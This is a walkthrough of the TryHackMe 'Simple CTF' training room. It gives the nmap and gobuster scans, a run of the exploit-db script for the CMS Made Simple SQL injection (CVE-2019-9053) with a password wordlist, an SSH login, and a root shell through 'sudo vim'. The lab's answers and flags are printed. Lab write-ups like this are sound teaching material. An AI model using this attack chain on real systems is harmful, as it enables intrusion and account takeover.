Hello Readers! Today I am going to take a walk-through and write ups one of the TryHackMe room called “Simple CTF”.
Deploy
Let’s deploy the machine.
First things first! When you deploy your machine and connect to the TryHackMe VPN, we are ready to begin.
Here there are around 10 questions to answers. Let's begin and perform step by step method.
#1 How many services are running under port 1000?
To answer that question you need to start a scan with the tool called “nmap”. I used nmap -p1-65535 <IP> command for the scan. Found answer is 2 services are running under port 1000.
#2 What is running on the higher port?
This answer is in the same nmap scan we did before. SSH is running on the higher port.
#3 What’s the CVE you’re using against the application?
For this question, we have to start gobuster search to find available url directories.
gobuster dir -u http://<IP-MACHINE>/ -w /usr/share/dirb/wordlists/common.txt
Go Buster result :
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
/simple (Status: 301)
After visiting each directories, i found interesting to the “/simple” one and i found a CMS Made Simple Application inside!
I googled about “cms made simple exploit” and i found that there are plenty of them.
I googled the specific Injections that i have found and got it from exploit-db.com. Here is the link for the exploitation script.
https://www.exploit-db.com/exploits/46635
The answer is CVE-2019-9053.
As also we found that running version is < 2.2.10 so this exploit is going to work for this current web site.
#4 To what kind of vulnerability is the application vulnerable?
After the research I have done and find this point that I know I am going to make SQL Injection(SQLi).
#5 What’s the password?
First, I have read documentation about the SQL Injection. So, When I scrolled page, I saw a python script. I copied the script inside a file and named it 46635.py.
Make sure you installed python in you operating system to perform this task.
python 46635.py -u http://<Machine-IP>/ –crack -w /usr/share/wordlists/rockyou.txt was the command which I executed to get the username mitch and the password secret.
Here I can able to find the mitch account available.
#6 Where can you login with the details obtained?
As we know about which ports are open, in the previous scan I made with nmap, I also scanned for services so I know that at 2222 port we have an ssh. So with these kind of information we can SSH the machine :
ssh {username_script_found}@{machine_ip} -p 2222
Answer for the question is SSH.
#7 What’s the user flag?
When you access the shell it’s time to see what is inside.
ls -la
You are going to notice a user.txt file.
cat user.txt
Answer is G00d j0b, keep up!
#8 Is there any other user in the home directory? What’s its name?
cd /home
ls
mitch & sunbath
#9 What can you leverage to spawn a privileged shell?
Well, if we type with “sudo -l” command it shows that we can use vim directory to gain root access.
Go to gtfobins site and search for vim sudo, you will get the command to gain root access.
sudo vim -c ‘:!/bin/sh’
#10 What’s the root flag?
cd /root
ls
root.txt
cat root.txt
W3ll d0n3. You made it!
Thank you for reading !!! I hope you find this walk-through useful and if there is something you would like to add or any suggestions, you can contact me anytime.
Happy Learning!